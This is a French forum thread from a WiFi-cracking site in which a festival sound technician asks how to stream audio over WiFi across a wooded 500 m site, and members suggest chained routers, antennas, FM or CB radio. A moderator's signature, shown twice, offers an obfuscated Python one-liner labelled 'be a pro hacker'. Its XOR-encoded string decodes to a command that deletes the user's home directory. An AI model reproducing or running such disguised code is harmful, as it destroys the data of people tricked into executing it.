Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-03-2012 18:46:57

NOMAD
N00b

le WIFI pour du transmettre du son

Bonjour
je suis régisseur technique d'un festival de musique
et je dois installer plusieurs points de diffusion sonore sur un site, sur une distance d'environ 500m

La solution de créer un réseau protégé WIFI serai la plus simple, mais je ma heurte à la porté d'un émetteur WIFI de base.

La question est la suivante, le fameux Awus036h Luxury, serait il la solution pour étendre mon réseau sur le site ?

en sachant que je souhaiterai utiliser comme récepteur des ordinateurs de base avec une carte wifi ordinaire.

Le son sera du MP3 en 256Kbs en stéréo, traité par un logiciel de streaming fais pour ça que l'on doit me passer.

Le site est arboré et il y a une sorte de butte d'une dizaine de mètres de haut haut milieu su site.

L'émetteur sera placé en proximité de la console de son en périphérie du site

Voilà la problématique, si une discussion existe déjà veuillez me l'indiquer, si non j'attend avec impatience vos suggestions et vos conseils
Merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-03-2012 19:42:49

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : le WIFI pour du transmettre du son

Bonjour NOMAD et bienvenue sur notre forum!
On peut avoir des entrées pour ton festival? tongue lol
C'est jouable avec des alfas, mais je pense qu'il y a mieux dans ton cas, en fait il faudrait que tu nous donnes
une idée du budget,

#3 09-03-2012 19:45:35

spawn
Modérateur

Bonsoir.

Les arbres, si c'est des conifères, c'est mort d'avance à cause de la forme des épines.
La butte de 10 m de haut est un obstacle sauf si on vise un peu au dessus avec une antenne directionnelle pour utiliser un effet de diffusion des champs E-M.
Si l'émetteur est en périphérie du site, ça me semble fini d'avance à cause de la butte et des arbres.
Il vaudrait mieux à mon humble avis faire comme ceci :
(pour des raisons de prix)

SON                                                                                                               
     ↓                                                                                                               
+----------+                           +---------+                               +---------+                                           
+  source  +=========ethernet==========+ routeur +===========ethernet============+ routeur +                                                        
+----------+                           +---wifi--+                               +---wifi--+
     ↓                               *      *      *                             *          *
    ###                            **       *       **                        **             *                                
    #O#                           *         *          *                    *                 *
    ###                       [PC]          [PC]         [PC]             [PC]                 *                                      
     ↓                         ↓              ↓            ↓               ↓                    [PC]                   
                              ###            ###          ###             ###                    ↓                          
    SON                       #O#            #O#          #O#             #O#                   ###                           
                              ###            ###          ###             ###                   #O#                           
                               ↓              ↓            ↓               ↓                    ###                   
                              SON            SON          SON             SON                    ↓  
                                                                                                SON

Le concept est super par contre, si tout le monde se gare autour d'un champ avec le portable connecté au WiFi branché sur l'autoradio à fond on doit pouvoir faire des sacrés concerts !

En parlant de ca, une diffusion radio ne serait-elle pas plus simple ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 10-03-2012 09:34:48

NOMAD
N00b

kcdtv a écrit :

Bonjour NOMAD et bienvenue sur notre forum!
On peut avoir des entrées pour ton festival? tongue lol
C'est jouable avec des alfas, mais je pense qu'il y a mieux dans ton cas, en fait il faudrait que tu nous donnes
une idée du budget,

Bonjour
eh bien oui vous aurez des places gratuites car le festival est gratuit, c'est pas formidable ça. Pour le budget comme d'ab il faut que ça coute le moins possible c'est pour cela que nous envisageons la solution WIFI car elle nous paraissé être la plus économique.

#5 10-03-2012 09:48:01

NOMAD
N00b

spawn a écrit :

Bonsoir.

Les arbres, si c'est des conifères, c'est mort d'avance à cause de la forme des épines.
La butte de 10 m de haut est un obstacle sauf si on vise un peu au dessus avec une antenne directionnelle pour utiliser un effet de diffusion des champs E-M.
Si l'émetteur est en périphérie du site, ça me semble fini d'avance à cause de la butte et des arbres.
Il vaudrait mieux à mon humble avis faire comme ceci :
(pour des raisons de prix)

SON                                                                                                               
     ↓                                                                                                               
+----------+                           +---------+                               +---------+                                           
+  source  +=========ethernet==========+ routeur +===========ethernet============+ routeur +                                                        
+----------+                           +---wifi--+                               +---wifi--+
     ↓                               *      *      *                             *          *
    ###                            **       *       **                        **             *                                
    #O#                           *         *          *                    *                 *
    ###                       [PC]          [PC]         [PC]             [PC]                 *                                      
     ↓                         ↓              ↓            ↓               ↓                    [PC]                   
                              ###            ###          ###             ###                    ↓                          
    SON                       #O#            #O#          #O#             #O#                   ###                           
                              ###            ###          ###             ###                   #O#                           
                               ↓              ↓            ↓               ↓                    ###                   
                              SON            SON          SON             SON                    ↓  
                                                                                                SON

Le concept est super par contre, si tout le monde se gare autour d'un champ avec le portable connecté au WiFi branché sur l'autoradio à fond on doit pouvoir faire des sacrés concerts !

En parlant de ca, une diffusion radio ne serait-elle pas plus simple ?

Bonjour
voilà une solution élégante de réseau, mais nous sommes en difficulté avec l'utilisation de cable, qu'il soit audio ou réseau ,car les longueurs sont énormes et aussi comme le public circulera partout nous allons avoir des problèmes de sécurité  et de casse.En effet vu la configuration du site les cables vont ce retrouver au sol donc potentiellement, on marche on roule dessus et on se prend les pied dedans etc... vous voyez les conséquences.

Ainsi la solution hertzienne wifi ou FM sont les plus simple en terme d'exploitation.
Pour la solution FM je dispose d'émetteur et récepteur FM que l'on utilise sur scène mais leur porté est limité à 100m sans aucun obstacles.
Je me suis renseigné pour un émetteur FM mais là ça devient très compliqué surtout avec le CSA que j'ai contacté et qui  est en difficulté pour me répondre car c'est une situation inhabituelle pour eux.

Par rapport à ma question de départ  le fameux Awus036h Luxury va t'il améliorer ma couverture WIFI en tant qu'émetteur ?

#6 10-03-2012 18:25:23

kcdtv
Membre d'honneur

Le but d'une alfa n'est pas d'être un routeur, il faut que tu prennes aussi en compte son comportement comme Point d'Accès. C'est à mon avis là qu'est le problème avec ton idée.
Ceci dit je n'ai pas d'alfa et je n'ai jamais essayé. wink
Je ne suis pas ingénieur télécom, ni de prêt ni de loin, avec du matériel courrant et ordinaire, la "solution" que je vois c'est celle-ci.
Soyez indulgent avec la qualité du shéma tongue

shemat.png

- donc 4 routeur avec comme minimum 2t2R ( 2 antennes émission/réception ), avec un firmware d'origine permettant de les configurer comme répétiteurs ou qui soient compatibles avec des firmwares "libres" type tomato. mettons 120 €
L'idéal serait des routeurs avec 3 antennes, avec 2 antennes directionnelles pour lier les routeurs et une omni (dans le but d'émettre)
-  8 antennes omnidirectionnelles , disons 200 €, pour assurer les liens de longues distances entre les routeurs.
- un bon abonnement avec une bonne qualité d'Internet
Je pense que comme c'est peut être possible... hmm
Mais attends d'autres réponses avant de courrir acheter les routeurs que rien ne vaut mieux l'expèrience dans ce genre de choses, entre la théorie et la pratique il y a des fois un décalage.

#7 10-03-2012 19:30:36

spawn
Modérateur

Franchement, émettre sur 1 km pendant un concert, ça ne doit pas non plus être extravagant comme demande de bande FM.
Peut-être qu'en partenariat avec une petite radio locale vous pourrez avoir le matos gratuit en échange d'une ou deux affiches ?

Je ne pourrais pas plus vous aider. J'appelle un expert en la matière.
Invocation !!
Il va peut-être arriver, je ne sais pas si j'ai assez de chakra. On verra tongue

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#8 10-03-2012 19:56:22

spawn
Modérateur

Alors, il m'a répondu, et il dit :
- Qu'il faut peut-ête contacter la SACEM si on passe par du FM

Et moi je dis que la citizen band (CB) (27MHz en 40 canaux) est parfaite :

Wikipedia a écrit :

À l'inverse de l'activité d'un radioamateur qui consiste en un service, la CB est un loisir. La CEPT, organisme européen chapeautant les services de télécommunications, a refusé d'intégrer la CB comme tel dès 1981.

En effet, tout un chacun, sans passer d'examen ni disposer d'aucune licence, peut acheter un émetteur-récepteur CB, le relier à une antenne et recevoir et émettre autour de la fréquence des 27 MHz.

Page wikipedia de la CB

@9b0ae3c4 méric.fr

#9 12-03-2012 21:49:47

kcdtv
Membre d'honneur

Il faut que tu m'apprennes à dessiner! lol
C'est sûr que si tu veux donner à toute la superficie du festival une couverture de qualité, il va falloir plus de routeurs (les doigts sur le shéma de spawn)
Un autre "détail", ça a l'air d'être un grand festival = des milliers de connections si tu laisses la possibilité à tout un chacun de se connecter, il y a fort à parier que ton système soit surchagé très rapidement et ne puisse assurer le service pour lequel tu veux le mettre en place.

#10 31-03-2012 14:57:10

spawn
Modérateur

Au hasard d'un forum d'orientation et d'emploi à St Jean D'angely , j'ai rencontré Jean-Christophe POPINOT de E-WI Télécom (Réseaux WiFi & Solutions Télécom).

Il était sur le stand voisin du mien.
Je lui ai parlé de ton problème, et il m'a dit que c'est son boulot.
(c'est sa boite en l'occurence qui a mis un hotspot sur la salle pour les stands)

Je te laisse son mail :
jc.popinot [*nospam*] e-wi.fr

@9b0ae3c4 méric.fr

Annonce